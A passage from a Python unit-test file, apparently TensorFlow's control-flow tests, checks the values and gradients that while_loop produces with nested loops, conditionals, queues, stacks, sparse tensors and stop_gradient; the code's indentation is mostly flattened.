asn1 = state_ops.assign_add(var_a, 1, name="a_add")
with ops.control_dependencies([asn1]):
asn2 = state_ops.assign_add(var_b, var_a, name="b_add")
with ops.control_dependencies([asn2]):
ni = math_ops.add(i, 1, name="i_add")
return ni
lpa = control_flow_ops.while_loop(
pred, loop_body, [c], parallel_iterations=1, name="loop")
self.assertEqual(0, var_b.eval())
lpa.eval() # Run the loop
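      # Each iteration increments var_a and then adds it to var_b:
      # var_b = 1 + 2 + ... + 10 = 55.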
self.assertEqual(55, var_b.eval())
self.assertEqual(10, var_a.eval())
def testWhileQueue_1(self):
with self.cached_session():
q = data_flow_ops.FIFOQueue(-1, dtypes.int32)
i = constant_op.constant(0)
def c(i):
return math_ops.less(i, 10)
def b(i):
ni = math_ops.add(i, 1)
ni = control_flow_ops.with_dependencies([q.enqueue((i,))], ni)
return ni
r = control_flow_ops.while_loop(c, b, [i], parallel_iterations=1)
self.assertEqual([10], r.eval())
for i in xrange(10):
self.assertEqual([i], q.dequeue().eval())
def testWhileStack_1(self):
with self.cached_session():
s = gen_data_flow_ops.stack_v2(-1, dtypes.int32, stack_name="foo")
i = constant_op.constant(0)
def c(i):
return math_ops.less(i, 10)
def b(i):
ni = math_ops.add(i, 1)
ni = control_flow_ops.with_dependencies(
[gen_data_flow_ops.stack_push_v2(s, i)], ni)
return ni
r = control_flow_ops.while_loop(c, b, [i], parallel_iterations=1)
x = constant_op.constant(0)
def c1(i, _):
return math_ops.greater(i, 0)
def b1(i, x):
ni = math_ops.subtract(i, 1)
nx = x + gen_data_flow_ops.stack_pop_v2(s, dtypes.int32)
return [ni, nx]
_, rx = control_flow_ops.while_loop(
c1,
b1, [r, x],
[r.get_shape(), tensor_shape.unknown_shape()],
parallel_iterations=1)
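      # The second loop pops the ten pushed values (9 down to 0) and sums
      # them: 45.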
self.assertEqual(45, rx.eval())
def _testWhileGrad_ColocateGradients(self, colocate):
gpu_dev_name = test.gpu_device_name() if test.is_gpu_available(
) else "/device:CPU:0"
graph = ops.Graph()
with graph.as_default():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
def b(x):
with ops.device(gpu_dev_name):
return math_ops.square(x)
loop = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = gradients_impl.gradients(
loop, v, colocate_gradients_with_ops=colocate)[0]
r_ops = graph.get_operations()
r_devices = [(op.name, op.device) for op in r_ops]
self.assertTrue(any("Square" in op.name for op in r_ops))
for (name, dev) in r_devices:
if not colocate and name.endswith("Square"):
          # Without colocation, only the forward Square op is on the GPU.
self.assertTrue(gpu_dev_name in dev)
elif colocate and "Square" in name:
          # With colocation, both the Square and Square_grad ops are on the
          # GPU.
self.assertTrue(gpu_dev_name in dev)
else:
self.assertFalse(gpu_dev_name in dev)
with self.test_session(graph=graph) as sess:
self.assertAllClose(1024.0, sess.run(r))
def testWhileGrad_ColocateGradients(self):
self._testWhileGrad_ColocateGradients(colocate=False)
self._testWhileGrad_ColocateGradients(colocate=True)
def testWhileGrad_Square(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = control_flow_ops.cond(math_ops.less(1, 2), lambda: r, lambda: v)
r = gradients_impl.gradients(r, v)[0]
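      # v is squared three times (2 -> 4 -> 16 -> 256), so r = v**8 and
      # dr/dv = 8 * v**7 = 1024 at v = 2.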
self.assertAllClose(1024.0, r.eval())
def testWhileGrad_Shape(self):
with self.cached_session():
x = array_ops.placeholder(dtypes.float32, shape=[None])
v = constant_op.constant([2.0], name="v")
n = constant_op.constant(0, name="n")
c = lambda i, v: math_ops.less(i, 5)
b = lambda i, v: [i + 1, math_ops.multiply(x, v)]
r = control_flow_ops.while_loop(
c,
b, [n, v],
[n.get_shape(), tensor_shape.unknown_shape()],
parallel_iterations=1)
r = gradients_impl.gradients(r[1], x)[0]
self.assertEqual([None], r.get_shape().as_list())
self.assertAllClose([810.0, 2560.0], r.eval(feed_dict={x: [3.0, 4.0]}))
def testWhileGrad_BaseShape(self):
with self.cached_session() as sess:
x = array_ops.placeholder(dtypes.float32, [None])
v0 = constant_op.constant([2.0, 2.0], name="v")
c = lambda v: constant_op.constant(False)
b = lambda v: math_ops.multiply(v, x)
r = control_flow_ops.while_loop(c, b, [v0])
y = math_ops.square(x)
r = gradients_impl.gradients([r, y], x)[0]
self.assertAllClose([2.0, 4.0], sess.run(r, feed_dict={x: [1.0, 2.0]}))
def testWhileGrad_MultipleUses(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = math_ops.multiply(r, r)
r = gradients_impl.gradients(r, v)[0]
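      # r = (v**8)**2 = v**16, so dr/dv = 16 * v**15 = 524288 at v = 2.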
self.assertEqual(524288.0, r.eval())
def testWhileGrad_LoopAdd(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = math_ops.add(r, r)
r = gradients_impl.gradients(r, v)[0]
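      # r = 2 * v**8, so dr/dv = 16 * v**7 = 2048 at v = 2.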
self.assertAllClose(2048.0, r.eval())
def _testWhileGrad_Mul(self, use_gpu, p_iters):
with self.test_session(use_gpu=use_gpu) as sess:
a = constant_op.constant(3.0, name="a")
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = lambda v: math_ops.multiply(v, a)
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=p_iters)
grad_a, grad_v = gradients_impl.gradients(r, [a, v])
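      # v is multiplied by a four times (2 -> 6 -> 18 -> 54 -> 162), so
      # r = v * a**4; dr/da = 4 * v * a**3 = 216 and dr/dv = a**4 = 81.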
grad_a_val, grad_v_val = sess.run([grad_a, grad_v])
self.assertAllClose(216.0, grad_a_val)
self.assertAllClose(81.0, grad_v_val)
def testWhileGrad_Mul(self):
self._testWhileGrad_Mul(use_gpu=False, p_iters=1)
self._testWhileGrad_Mul(use_gpu=False, p_iters=10)
self._testWhileGrad_Mul(use_gpu=True, p_iters=1)
self._testWhileGrad_Mul(use_gpu=True, p_iters=10)
def _testNestedWhileCondWhileGrad(self, use_gpu):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113294377 (unknown shape)")
with self.test_session(use_gpu=use_gpu):
v = constant_op.constant(1.0)
def inner_loop(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
c = lambda x: math_ops.less(x, 128.0)
def b(x):
return control_flow_ops.cond(
constant_op.constant(True),
lambda: math_ops.square(inner_loop(x)[1]),
lambda: math_ops.multiply(x, 2.0))
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
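      # One outer iteration: the inner loop yields 16 * x, squared to
      # 256 * x**2, so dr/dv = 512 * v = 512 at v = 1.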
self.assertAllClose(512.0, r.eval())
def testNestedWhileCondWhileGrad(self):
self._testNestedWhileCondWhileGrad(use_gpu=False)
self._testNestedWhileCondWhileGrad(use_gpu=True)
def testWhileGrad_Variable(self):
with self.cached_session():
a = variables.Variable(3.0)
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = lambda v: math_ops.multiply(v, a)
r = control_flow_ops.while_loop(c, b, [v], parallel_iterations=1)
r = gradients_impl.gradients(r, a)
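      # As in _testWhileGrad_Mul: r = v * a**4, so dr/da = 4 * v * a**3 = 216.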
variables.global_variables_initializer().run()
self.assertAllClose(216.0, r[0].eval())
def testWhileGradInCond(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/110550782 (gradient w.r.t external variable)")
with self.cached_session():
n = ops.convert_to_tensor(1.0, name="n")
x = array_ops.placeholder(dtypes.float32, shape=None)
c = lambda n: math_ops.less(n, 10.0)
b = lambda n: math_ops.add(n, x)
def fn1():
r = control_flow_ops.while_loop(c, b, [n],
[tensor_shape.unknown_shape()])
return gradients_impl.gradients(r, x)
r = control_flow_ops.cond(math_ops.less(1, 2), fn1, lambda: x)
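      # n increases by x until it reaches 10; with x = 1 that is 9 additions,
      # so dr/dx = 9.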
self.assertAllClose(9.0, r.eval(feed_dict={x: 1.0}))
def testGradInWhileWrtInitialLoopVal(self):
with self.cached_session():
x = array_ops.placeholder(dtypes.float32, shape=(), name="x")
y = x + 1
def body(i, v):
z = v * 2
return i + 1, gradients_impl.gradients(z, x)[0]
with self.assertRaisesRegexp(
ValueError,
"Cannot compute gradient inside while loop with respect to op 'x'. "
"We do not support taking the gradient wrt or through the initial "
"value of a loop variable. Gradients can be computed through "
"loop invariants or wrt the input parameters to the loop body."):
control_flow_ops.while_loop(lambda i, x: i < 3, body, [0, y])
def testWhileGradInWhile(self):
with self.cached_session():
n = ops.convert_to_tensor(1.0, name="n")
x = array_ops.placeholder(dtypes.float32, shape=None)
c = lambda n: math_ops.less(n, 10.0)
b = lambda n: math_ops.add(n, x)
def b1(n):
r = control_flow_ops.while_loop(c, b, [n],
[tensor_shape.unknown_shape()])
return gradients_impl.gradients(r, x)
r = control_flow_ops.while_loop(lambda n: n < 6.0, b1, [n],
[tensor_shape.unknown_shape()])
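      # The first outer iteration returns the inner gradient 9.0, which fails
      # the outer condition (9 < 6), so r = 9.0.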
self.assertAllClose(9.0, r.eval(feed_dict={x: 1.0}))
def testCondGradInNestedWhiles(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113346829 (gpu failure)")
def outer_body(i, x):
_, x = control_flow_ops.while_loop(
lambda j, x: j < 3, inner_body, [0, 0.0])
return i + 1, x
def inner_body(j, x):
y = control_flow_ops.cond(math_ops.less(x, 1), lambda: 2 * x, lambda: x)
return j + 1, gradients_impl.gradients(y, x)[0]
i, x = control_flow_ops.while_loop(lambda i, x: i < 3, outer_body, [0, 0.0])
with self.cached_session() as sess:
i_val, x_val = sess.run([i, x])
self.assertEqual(i_val, 3)
self.assertAllClose(x_val, 1.0)
def testWhile_NestedInput(self):
with self.cached_session() as sess:
named = collections.namedtuple("named", ("a", "b"))
loop_vars = [
named(a=constant_op.constant(0.0), b=constant_op.constant(1.0)),
(constant_op.constant(2.0), constant_op.constant(3.0)),
constant_op.constant(4.0)
]
c = lambda lv0, _1, _2: lv0.a < 100.0
def b(lv0, lv1, lv2):
lv0 = named(a=lv0.a + 1, b=lv0.b)
lv1 = (lv1[0] + 1, lv1[1])
lv2 += 2
return [lv0, lv1, lv2]
r = control_flow_ops.while_loop(c, b, loop_vars)
self.assertTrue(isinstance(r, list))
self.assertTrue(isinstance(r[0], named))
self.assertTrue(isinstance(r[1], tuple))
self.assertTrue(isinstance(r[2], ops.Tensor))
r_flattened = nest.flatten(r)
self.assertEqual([100.0, 1.0, 102.0, 3.0, 4.0 + 100 * 2.0],
sess.run(r_flattened))
def testWhile_NestedBadArityFails(self):
with self.cached_session():
named = collections.namedtuple("named", ("a", "b"))
loop_vars = [
named(a=constant_op.constant(0.0), b=constant_op.constant(1.0)),
(constant_op.constant(2.0), constant_op.constant(3.0)),
constant_op.constant(4.0)
]
c = lambda lv0, _1, _2: lv0.a < 100.0
def b(lv0, lv1, _):
return [lv0, lv1]
with self.assertRaisesRegexp(ValueError, "the same number of elements"):
control_flow_ops.while_loop(c, b, loop_vars)
def testWhileGrad_ys_xs(self):
with self.cached_session():
x = constant_op.constant(3.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x, y: math_ops.less(x, 100.0)
def b(x, y):
y1 = math_ops.add(x, y)
x1 = math_ops.multiply(x, y1)
return x1, y1
rx, ry = control_flow_ops.while_loop(c, b, [x, y], parallel_iterations=1)
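      # Two iterations: rx = x * (x + 1) * (x + y)**2 = 300 and
      # ry = (x + 1) * (x + y) = 20; the asserted gradients follow.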
r = gradients_impl.gradients([rx, ry], x)
self.assertAllClose(304.0, r[0].eval())
r = gradients_impl.gradients([rx, ry], y)
self.assertAllClose(124.0, r[0].eval())
r = gradients_impl.gradients([rx], x)
self.assertAllClose(295.0, r[0].eval())
r = gradients_impl.gradients([rx], y)
self.assertAllClose(120.0, r[0].eval())
def testWhileGrad_Dependency(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(2.0, name="x")
c = lambda i, x: math_ops.less(i, 10)
def b(i, x):
x = math_ops.multiply(x, 2.0)
i = math_ops.add(i, 1)
return i, x
ri, rx = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
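      # x is doubled 10 times, so rx = x * 2**10 and drx/dx = 1024.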
r = gradients_impl.gradients([ri, rx], x)
self.assertAllClose(1024.0, r[0].eval())
r = gradients_impl.gradients([rx], x)
self.assertAllClose(1024.0, r[0].eval())
def testWhileGrad_NoGradient(self):
with self.cached_session():
v = constant_op.constant(2.0, name="v")
c = lambda v: math_ops.less(v, 100.0)
b = math_ops.square
r = control_flow_ops.while_loop(c, b, [v], back_prop=False)
r = math_ops.add(r, v)
r = gradients_impl.gradients(r, v)
self.assertAllClose(1.0, r[0].eval())
def testWhileGrad_NoDependency(self):
with self.cached_session() as sess:
variable = variables.Variable(array_ops.ones([2, 3]))
duration = array_ops.zeros([], dtype=dtypes.int32)
def cond(duration, tensor, _):
del tensor
return duration < 10
def body(duration, tensor, _):
return (duration + 1, tensor, tensor)
loop_vars = [duration, variable, variable]
tensors = control_flow_ops.while_loop(
cond=cond, body=body, loop_vars=loop_vars)
cost = math_ops.reduce_sum(tensors[2])
grad = gradients_impl.gradients(cost, [variable])
variables.global_variables_initializer().run()
self.assertAllClose(np.ones([2, 3]), sess.run(grad[0]))
def testWhileGrad_Const(self):
with self.cached_session() as sess:
c0 = constant_op.constant(0.0, name="c0")
c1 = constant_op.constant(1.0, name="c1")
duration = constant_op.constant(0, name="t")
def cond(duration, _):
return duration < 1
def body(duration, _):
return duration + 1, c1
loop_vars = [duration, c0]
tensors = control_flow_ops.while_loop(
cond=cond, body=body, loop_vars=loop_vars)
cost = math_ops.reduce_sum(tensors[1])
grad = gradients_impl.gradients(cost, [c0])
self.assertAllClose(0.0, sess.run(grad[0]))
def testWhileGrad_SerialTwoLoops(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(2.0, name="x")
c = lambda i, x: math_ops.less(i, 5)
def b(i, x):
x = math_ops.multiply(x, 2.0)
i = math_ops.add(i, 1)
return i, x
_, rx = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
_, rx = control_flow_ops.while_loop(c, b, [i, rx], parallel_iterations=1)
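      # Each loop doubles x five times, so rx = x * 2**10 and drx/dx = 1024.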
r = gradients_impl.gradients([rx], x)
self.assertAllClose(1024.0, r[0].eval())
def testWhileGrad_ParallelTwoLoops(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(2.0, name="x")
c = lambda i, x: math_ops.less(i, 5)
def b(i, x):
x = math_ops.multiply(x, 2.0)
i = math_ops.add(i, 1)
return i, x
_, r1 = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
_, r2 = control_flow_ops.while_loop(c, b, [i, x], parallel_iterations=1)
rx = math_ops.add(r1, r2)
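      # r1 = r2 = x * 2**5, so drx/dx = 2 * 32 = 64.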
r = gradients_impl.gradients([rx], x)
self.assertAllClose(64.0, r[0].eval())
def testWhileGrad_OneOutputWithControlDependencyOnSecond(self):
with self.cached_session():
i = constant_op.constant(0, name="i")
x = constant_op.constant(1.0, name="x")
y = constant_op.constant(1.0, name="y")
c = lambda i, *_: math_ops.less(i, 1, name="cond_less")
def b(i, xi, yi):
# return (i + 1, xi, xi + yi)
return (math_ops.add(i, 1, name="inc"), array_ops.identity(
xi, name="xi"), math_ops.add(xi, yi, name="xi_plus_yi"))
_, x_f, y_f = control_flow_ops.while_loop(c, b, [i, x, y])
with ops.control_dependencies([x_f]):
y_f_d = array_ops.identity(y_f, name="y_f_d")
self.assertAllClose(2.0, y_f_d.eval()) # y_f_d = 1.0 + 1.0
g = gradients_impl.gradients([y_f_d], [x])[0]
self.assertTrue(g is not None)
self.assertAllClose(1.0, g.eval()) # y_f_d = x + 1.0, dy_f_d/dx = 1.0
def _testNestedWhileGrad_Simple(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
v = constant_op.constant(1.0)
def inner_loop(s):
c = lambda x: math_ops.less(x, 4.0)
b = lambda x: math_ops.multiply(x, 2.0)
return control_flow_ops.while_loop(c, b, [s])
c = lambda x: math_ops.less(x, 2.0)
b = lambda x: math_ops.multiply(inner_loop(x), 2.0)
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
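      # The body is linear in v: two inner doublings (x4), then x2, so
      # r = 8 * v and dr/dv = 8.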
self.assertAllClose(8.0, r.eval())
def testNestedWhileGrad_Simple(self):
self._testNestedWhileGrad_Simple(use_gpu=False)
self._testNestedWhileGrad_Simple(use_gpu=True)
def testNestedWhileGrad_SerialInner(self):
with self.cached_session():
v = constant_op.constant(1.0)
def inner_loop1(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
def inner_loop2(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
c = lambda x: math_ops.less(x, 128.0)
b = lambda x: inner_loop2(inner_loop1(x)[1])[1]
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
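      # Each inner loop multiplies by 2**4, so r = 256 * v and dr/dv = 256.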
self.assertAllClose(256.0, r.eval())
def testNestedWhileGrad_ParallelInner(self):
with self.cached_session():
v = constant_op.constant(1.0)
def inner_loop1(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
def inner_loop2(s):
z = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 4)
b = lambda i, x: [math_ops.add(i, 1), math_ops.multiply(x, 2.0)]
return control_flow_ops.while_loop(c, b, [z, s])
c = lambda x: math_ops.less(x, 128.0)
b = lambda x: math_ops.multiply(inner_loop1(x)[1], inner_loop2(x)[1])
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
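      # b(x) = (16 * x) * (16 * x) = 256 * x**2, so dr/dv = 512 * v = 512.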
self.assertAllClose(512.0, r.eval())
def testNestedWhileGrad_ParallelIterations(self):
# Make sure the stack pushes and pops of an inner loop are executed in
# the sequential order of the iterations of its outer loop.
with self.cached_session() as sess:
def inner_loop(t):
fn = lambda n: n + math_ops.square(var)
return functional_ops.map_fn(fn=fn, elems=t, parallel_iterations=10)
def outer_loop(inp):
return functional_ops.map_fn(
fn=inner_loop, elems=inp, parallel_iterations=10)
var = variables.Variable(constant_op.constant(3.0))
inp = constant_op.constant([[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]])
res = outer_loop(inp)
optimizer = adam.AdamOptimizer(learning_rate=0.001)
train_op = optimizer.minimize(math_ops.reduce_mean(math_ops.square(res)))
sess.run(variables.global_variables_initializer())
sess.run(train_op)
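      # One Adam step with learning_rate=0.001 moves var from 3.0 to ~2.999.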
self.assertAllClose(2.999, var.eval())
def _testWhileCondGrad_Simple(self, use_gpu):
with self.test_session(use_gpu=use_gpu):
v = ops.convert_to_tensor(2.0, name="v")
n = ops.convert_to_tensor(100.0, name="n")
one = ops.convert_to_tensor(1.0, name="one")
c = lambda x: math_ops.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(constant_op.constant(True),
lambda: math_ops.square(x),
lambda: math_ops.subtract(x, one))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
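      # v is squared until it reaches 256 (2 -> 4 -> 16 -> 256), so r = v**8
      # and dr/dv = 8 * v**7 = 1024.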
self.assertAllClose(1024.0, r.eval())
def testWhileCondGrad_Simple(self):
if control_flow_ops.ENABLE_COND_V2:
return unittest.skip("b/113294377 (unknown shape)")
self._testWhileCondGrad_Simple(use_gpu=False)
self._testWhileCondGrad_Simple(use_gpu=True)
def testWhileCondGrad_UnknownShape(self):
with self.cached_session() as sess:
v = array_ops.placeholder(dtypes.float32)
n = ops.convert_to_tensor(100.0, name="n")
one = ops.convert_to_tensor(1.0, name="one")
c = lambda x: math_ops.less(x, n)
# pylint: disable=undefined-variable
# for OSS build
b = lambda x: control_flow_ops.cond(constant_op.constant(True),
lambda: math_ops.square(x),
lambda: math_ops.subtract(x, one))
# pylint: enable=undefined-variable
r = control_flow_ops.while_loop(c, b, [v])
r = gradients_impl.gradients(r, v)[0]
r = sess.run(r, feed_dict={v: 2.0})
self.assertAllClose(1024.0, r)
def testWhileGrad_Concat(self):
with self.cached_session() as sess:
x = variable_scope.get_variable("x", initializer=[[1., 2.]])
i0 = constant_op.constant(0)
h0 = array_ops.zeros([0, 2])
def condition(i, _):
return i < 2
def body(i, h):
return i + 1, array_ops.concat([h, x], 0)
_, h = control_flow_ops.while_loop(
condition, body, [i0, h0],
[i0.get_shape(), tensor_shape.TensorShape([None, 2])])
s = math_ops.reduce_sum(h)
sess.run(variables.global_variables_initializer())
optimizer = gradient_descent.GradientDescentOptimizer(0.01)
op = optimizer.minimize(s)
sess.run(op)
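      # h contains two copies of x, so ds/dx = 2 per element; one gradient
      # descent step with lr=0.01 moves each element of x by -0.02.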
self.assertAllClose([[0.98000002, 1.98000002]], sess.run(x))
def testWhileWithRefsWithGradients_1(self):
with self.cached_session() as sess:
x = variables.Variable(0.)._ref() # pylint: disable=protected-access
i = constant_op.constant(0)
c = lambda i, x: math_ops.less(i, 10)
self.assertEqual(x.dtype, dtypes.float32_ref)
def body(i, x):
self.assertEqual(x.dtype, dtypes.float32_ref)
return [i + 1, gen_array_ops.ref_identity(x)]
r = control_flow_ops.while_loop(c, body, [i, x], parallel_iterations=5)
grad_ys = [variables.Variable(73)._ref()] # pylint: disable=protected-access
grad = gradients_impl.gradients([r[1]], [x], grad_ys=grad_ys)
variables.global_variables_initializer().run()
self.assertEqual(r[0].dtype, dtypes.int32)
self.assertEqual(r[1].dtype, dtypes.float32_ref)
value_i, value_x, value_x_grad = sess.run(r + grad)
self.assertEqual(10, value_i)
self.assertEqual(0, value_x)
self.assertEqual(73, value_x_grad)
def testWhileGrad_IndexedSlices(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant([0, 3], name="indices")
shape = constant_op.constant([10], name="dense_shape")
i = constant_op.constant(0)
x = ops.IndexedSlices(values, indices, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
ops.IndexedSlices(x.values * 2.0, x.indices, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
r = gradients_impl.gradients(r.values, values)[0]
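      # The values are doubled 10 times, so the per-element gradient is
      # 2**10 = 1024.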
self.assertAllClose(np.array([1024.0, 1024.0]), r.eval())
def testWhileGrad_SparseTensor(self):
with self.cached_session():
values = constant_op.constant([2.0, 4.0], name="values")
indices = constant_op.constant(
[[0], [3]], dtype=dtypes.int64, name="indices")
shape = constant_op.constant([10], dtype=dtypes.int64, name="dense_shape")
i = constant_op.constant(0)
x = sparse_tensor.SparseTensor(indices, values, dense_shape=shape)
def c(i, _):
return i < 10
def b(i, x):
return [
i + 1,
sparse_tensor.SparseTensor(x.indices, x.values * 2.0, x.dense_shape)
]
_, r = control_flow_ops.while_loop(c, b, [i, x])
r = gradients_impl.gradients(r.values, values)[0]
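      # As above, ten doublings give a per-element gradient of 2**10 = 1024.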
self.assertAllClose(np.array([1024.0, 1024.0]), r.eval())
def testCallGradInLoop(self):
with self.cached_session() as sess:
i0 = constant_op.constant(0)
params = constant_op.constant(5.0)
params_1 = math_ops.square(params)
def c(i, _):
return i < 10
def b(i, x):
data = constant_op.constant([1.0, 2.0, 3.0])
data = math_ops.multiply(data, params_1)
x1 = x + gradients_impl.gradients(data, params)[0]
return i + 1, x1
output_grad = control_flow_ops.while_loop(
c, b, [i0, constant_op.constant(0.0)])
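      # Each iteration adds d(sum([1., 2., 3.] * params**2))/d(params)
      # = 6 * 2 * params = 60; ten iterations accumulate to 600.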
self.assertAllClose(600.0, sess.run(output_grad)[1])
def testWhileAndTensorArray(self):
with self.cached_session() as sess:
param = constant_op.constant(2.0)
n0 = constant_op.constant(0)
y0 = constant_op.constant([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], name="elems")
def c(i, _):
return i < 10
def b(i, y):
return [
i + 1,
functional_ops.map_fn(lambda x: math_ops.multiply(x, param), y)
]
r = control_flow_ops.while_loop(c, b, [n0, y0], parallel_iterations=1)
r = gradients_impl.gradients(r, param)[0]
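      # Each element becomes y_i * param**10, so the gradient w.r.t. param is
      # (1 + 2 + ... + 6) * 10 * param**9 = 21 * 5120 = 107520.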
self.assertAllClose(107520.0, sess.run(r))
def testWhileGrad_StopGrad(self):
with self.cached_session():
x = constant_op.constant(3.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x, y: math_ops.less(x, 100.0)
def b(x, y):
y1 = math_ops.square(y)
x1 = math_ops.add(math_ops.square(x), y1)
return x1, y1
rx, ry = control_flow_ops.while_loop(c, b, [x, y])
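      # Two iterations: ry = y**4 = 16 and rx = (x**2 + y**2)**2 + y**4 = 185;
      # the asserted gradients follow.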
r = gradients_impl.gradients(rx, y)[0]
self.assertEqual(136.0, r.eval())
r = gradients_impl.gradients(ry, y)[0]
self.assertEqual(32.0, r.eval())
r = gradients_impl.gradients(array_ops.stop_gradient(rx), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(array_ops.stop_gradient(ry), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(
array_ops.stop_gradient(math_ops.square(rx)), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(
array_ops.stop_gradient(math_ops.add(rx, ry)), x)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(
array_ops.stop_gradient(math_ops.add(rx, ry)), y)[0]
self.assertEqual(r, None)
r = gradients_impl.gradients(math_ops.add(rx, ry), y)[0]
self.assertEqual(168.0, r.eval())
r = gradients_impl.gradients(
math_ops.add(rx, array_ops.stop_gradient(ry)), y)[0]
self.assertEqual(136.0, r.eval())
r = gradients_impl.gradients(
math_ops.add(array_ops.stop_gradient(rx), ry), y)[0]
self.assertEqual(32.0, r.eval())
def testWhileGrad_StopGradInside(self):
with self.cached_session():
x = constant_op.constant(3.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x, y: math_ops.less(x, 100.0)
def b(x, y):
y1 = array_ops.stop_gradient(math_ops.square(y))
x1 = math_ops.add(math_ops.square(x), y1)
return x1, y1
rx, _ = control_flow_ops.while_loop(c, b, [x, y])
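      # With y1 stopped, rx depends on y only through stopped values, so
      # drx/dy = 0; drx/dx = 2 * (x**2 + y**2) * 2 * x = 2 * 13 * 6 = 156.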
r = gradients_impl.gradients(rx, y)[0]
self.assertAllClose(0.0, r.eval())
r = gradients_impl.gradients(rx, x)[0]
self.assertAllClose(156.0, r.eval())
def testWhileGrad_StopGradInsideNoShape(self):
with self.cached_session() as sess:
x = array_ops.placeholder(dtypes.float32)
y = array_ops.placeholder(dtypes.float32)
c = lambda x, y: math_ops.less(math_ops.reduce_sum(x), 100.0)
def b(x, y):
y1 = array_ops.stop_gradient(math_ops.square(y, name="stopped"))
x1 = math_ops.add(math_ops.square(x), y1)
return x1, y1
rx, _ = control_flow_ops.while_loop(c, b, [x, y])
r = gradients_impl.gradients(rx, y)[0]
feed_dict = {x: [3.0, 4.0], y: [2.0, 3.0]}
self.assertAllClose([0.0, 0.0], sess.run(r, feed_dict=feed_dict))
r = gradients_impl.gradients(rx, x)[0]
self.assertAllClose([156.0, 400.0], sess.run(r, feed_dict=feed_dict))
name = "gradients/while/stopped_grad"
all_ops = x.graph.get_operations()
self.assertFalse(any([name in op.name for op in all_ops]))
def testWhileGradGradFail(self):
theta = variables.Variable(initial_value=1.)
def fn(prev, x):
return prev + x * theta
result = functional_ops.scan(fn, np.array([1., 2., 3.], dtype=np.float32))
grad_theta = gradients_impl.gradients(result, theta)
with self.assertRaisesRegexp(TypeError, "Second-order gradient"):
gradients_impl.gradients(grad_theta, theta)
grad_theta_stopped = array_ops.stop_gradient(grad_theta)
gradients_impl.gradients(grad_theta_stopped, theta)
def testStopGradOnWhileGrad(self):
with self.cached_session():
x = constant_op.constant(2.0, name="x")
y = constant_op.constant(2.0, name="y")
c = lambda x: math_ops.less(x, 100.0)
b = lambda x: math_ops.multiply(x, y)
rx = control_flow_ops.while_loop(c, b, [x])
rg = gradients_impl.gradients(rx, y)[0]
rg = array_ops.stop_gradient(rg)
r = math_ops.add(math_ops.square(y), rx)
r = math_ops.add(r, rg)
r = gradients_impl.gradients(r, y)[0]
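      # Six multiplications give rx = x * y**6 = 128; rg = drx/dy = 384 is
      # stopped, so dr/dy = d(y**2)/dy + drx/dy = 4 + 384 = 388.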
self.assertEqual(388.0, r.eval())
def testWhileGradientWithNontrainablePath1(self):
q = variables.Variable([7., 8.])
def cond(_, y):
del y
return False
def body(x, _):
return x, math_ops.cast(x, dtypes.float32) + math_ops.reduce_sum(q)
_, y = control_flow_ops.while_loop(cond, body, (math_ops.argmin(q), 0.))
dy_dq, = gradients_impl.gradients(y, q)
self.assertIsNotNone(dy_dq)
